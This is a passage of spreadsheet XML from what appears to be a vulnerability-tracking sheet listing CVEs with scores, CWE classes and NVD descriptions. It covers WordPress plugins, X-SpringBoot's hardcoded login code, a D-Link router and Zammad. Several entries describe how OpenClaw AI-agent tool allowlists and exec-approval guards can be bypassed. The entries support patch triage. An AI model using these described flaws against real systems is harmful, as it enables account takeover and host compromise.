        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93399</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S18" s="5" t="inlineStr">
        <is>
          <t>The Bookly plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 28.2 via the 'bookly_get_form_id', 'bookly_render_complete', 'bookly_add_to_calendar' and 'bookly_rollback_order' AJAX actions. This is due to the 'bookly_get_form_id' handler blindly storing the attacker-controlled 'order_id' from the submitted form_data into a new booking session, which the 'bookly_render_complete' handler then trusts to look up and return the corresponding Order's secret token without verifying that the current session created that order. This makes it possible for unauthenticated attackers to enumerate sequential order IDs, disclose other customers' order tokens, retrieve calendar/appointment information via 'bookly_add_to_calendar' and permanently delete arbitrary non-completed bookings via 'bookly_rollback_order', which cascade-deletes the customer_appointment and (when no other customers are attached) the underlying appointment.</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93399</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97063</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="inlineStr"/>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr">
        <is>
          <t>spring, gin</t>
        </is>
      </c>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S19" s="5" t="inlineStr">
        <is>
          <t>X-SpringBoot through 6.0 returns login verification codes in HTTP responses from unauthenticated endpoints GET /sys/mobile/code and GET /sys/email/code without sending them to account owners. Attackers can request codes using known mobile numbers or email addresses, read them from responses, and authenticate as victims via POST /sys/emailOrMobileLogin/login to hijack accounts.</t>
        </is>
      </c>
      <c r="T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97063</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97064</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="inlineStr"/>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr">
        <is>
          <t>spring, gin</t>
        </is>
      </c>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>CWE-1392</t>
        </is>
      </c>
      <c r="S20" s="5" t="inlineStr">
        <is>
          <t>X-SpringBoot through 6.0 ships with a hardcoded static master login verification code 172839 enabled by default in the database seed. Unauthenticated attackers can authenticate as any user by submitting the public master code to the emailOrMobileLogin endpoint with a known email or mobile number.</t>
        </is>
      </c>
      <c r="T20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97064</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-51457</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="inlineStr"/>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr"/>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q21" s="5" t="inlineStr"/>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="S21" s="5" t="inlineStr">
        <is>
          <t>D-Link DAP-2610 up to 2.06B08r099 contains an authenticated command injection vulnerability within the web interface at the /index.xgi endpoint. An attacker with authenticated access can exploit some parameters to execute arbitrary system commands.</t>
        </is>
      </c>
      <c r="T21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-51457</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100520</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="inlineStr"/>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr"/>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q22" s="5" t="inlineStr"/>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S22" s="5" t="inlineStr">
        <is>
          <t>Laranode versions before 1.2.1 contain a path traversal vulnerability in the POST /filemanager/upload-file endpoint that allows authenticated users to write arbitrary files outside their home directory. Attackers can supply directory traversal sequences in the path parameter to write PHP files into other tenants' web roots and execute code as those tenants.</t>
        </is>
      </c>
      <c r="T22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100520</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100544</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="inlineStr"/>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q23" s="5" t="inlineStr"/>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S23" s="5" t="inlineStr">
        <is>
          <t>openclaw's @openclaw/voice-call package before 2026.8.1 launches the configured agent for classic inbound voice calls without propagating the caller's identity or non-owner status. As a result, owner-only tool filtering can fail open and expose the agent's normal tool authority to a remote caller. A caller who is admitted by the configured inbound-call policy (open, pairing, or allowlist) on a deployment with inbound calling enabled can therefore drive tools intended for the trusted owner, potentially reading data, modifying files, executing commands, or controlling connected services depending on the agent's configuration. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100544</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100552</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="inlineStr"/>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q24" s="5" t="inlineStr"/>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S24" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.8.1 does not correctly enforce per-chat tool policies for Codex app-server runtime tools. A conversation-level tools.allow rule filtered OpenClaw tools but did not restrict the shell, process, file, and patch tools owned by the Codex runtime. When a lower-trust conversation was assigned to a Codex runtime and restricted with a per-chat tool allowlist, a participant able to trigger that agent could still reach native command and file tools, bypassing the configured allowlist. The practical impact depends on the runtime's host permissions and sandbox configuration. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100552</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100575</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="inlineStr"/>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr"/>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q25" s="5" t="inlineStr"/>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S25" s="5" t="inlineStr">
        <is>
          <t>OpenClaw Slack versions before 2026.8.1 fail to properly enforce sender allowlists in multi-person direct messages. Disallowed participants can trigger Slack agents and access tools and data granted to those agents by bypassing configured sender policies.</t>
        </is>
      </c>
      <c r="T25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100575</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100580</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="inlineStr"/>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q26" s="5" t="inlineStr"/>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="S26" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.7.1 improperly handles case sensitivity in the model-facing cron tool: a mixed-case payload kind can pass the agent-facing shell-execution guard and later normalize into a command job. An actor able to steer a tool-enabled agent can therefore create a persistent cron job that executes attacker-selected commands with the privileges of the OpenClaw process user, resulting in access to host files and credentials and impact to scheduled service availability. The issue is limited to cron jobs created or edited through the model-facing cron tool; direct CLI and authorized Gateway scheduling surfaces are trusted operator controls. Fixed in 2026.7.1.</t>
        </is>
      </c>
      <c r="T26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100580</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100586</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="inlineStr"/>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr"/>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q27" s="5" t="inlineStr"/>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S27" s="5" t="inlineStr">
        <is>
          <t>OpenClaw Codex before 2026.7.1 fails to properly enforce owner authorization when creating native conversation bindings. Non-owner channel senders with command access can create bindings to the native Codex runtime and execute host-capable turns with access to files, tools, and processes.</t>
        </is>
      </c>
      <c r="T27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100586</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100587</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="inlineStr"/>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q28" s="5" t="inlineStr"/>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S28" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.7.1 fail to properly validate owner authorization in the Codex computer-use installation command. Non-owner channel senders can install arbitrary plugins and execute MCP processes with OpenClaw user privileges, affecting host confidentiality, integrity, and availability.</t>
        </is>
      </c>
      <c r="T28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100587</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100596</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="inlineStr"/>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr"/>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q29" s="5" t="inlineStr"/>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S29" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.7.1 fail to properly authorize non-owner users executing MCP configuration changes through /mcp set and /mcp unset commands. Attackers can persist arbitrary stdio MCP commands that execute with OpenClaw process privileges when configuration loads, compromising host confidentiality, integrity, and availability.</t>
        </is>
      </c>
      <c r="T29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100596</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100599</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="inlineStr"/>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q30" s="5" t="inlineStr"/>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S30" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions 2026.5.1 through 2026.7.0 fail to apply the configured exec approval path to Google Meet node commands. The googlemeet.chrome command accepts caller-supplied audio command arrays and executes them on a paired node without going through the normal system.run approval flow. In deployments with the Google Meet plugin enabled, a paired Chrome node, and the googlemeet.chrome node command allowed, a tool-enabled agent able to invoke that command can execute attacker-selected processes on the paired node, impacting files, credentials, browser profiles, and availability on that node. The issue is fixed in 2026.7.1; as a workaround, remove googlemeet.chrome from allowed node commands or disable the Google Meet plugin.</t>
        </is>
      </c>
      <c r="T30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100599</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19804</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q31" s="5" t="inlineStr"/>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S31" s="5" t="inlineStr">
        <is>
          <t>The s2Member – Excellent for All Kinds of Memberships, Content Restriction Paywalls &amp; Member Access Subscriptions plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 260814 via the 'first_name' parameter parameter. This is due to insufficient sanitization of the first_name parameter via esc_refs(), which strips only regex backreferences and not PHP tags, before substitution into the eval'd Signup Tracking Codes template, combined with disclosure of the site-global proxy verification key that allows PayPal postback verification to be bypassed. This makes it possible for unauthenticated attackers to execute code on the server. Successful exploitation requires that the site administrator has configured a Signup Tracking Codes template containing the %%first_name%% placeholder (a documented, GUI-supported feature) and that the attacker has obtained the site-global proxy verification key, which is exposed in plaintext in the JSON response of any PayPal Checkout AJAX request on the target site.</t>
        </is>
      </c>
      <c r="T31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19804</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61525</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="inlineStr"/>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q32" s="5" t="inlineStr"/>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S32" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. In 7.0.2 and 7.1.0, zammad's session management for websocket and long-polling connections is susceptible to a path traversal attack. Session identifiers supplied by the client are insufficiently validated before being used to construct internal file paths. When the file-based session store is active (the default configuration), an authenticated attacker can manipulate the session identifier to reference locations outside the intended storage directory, leading to the deletion of arbitrary files and directories on the server. Exploitation requires only a low-privilege authenticated session and a single crafted request. Instances configured to use the Redis-based session store are not affected. This issue is fixed in versions 7.0.3 and 7.1.1.</t>
        </is>
      </c>
      <c r="T32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61525</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62062</t>
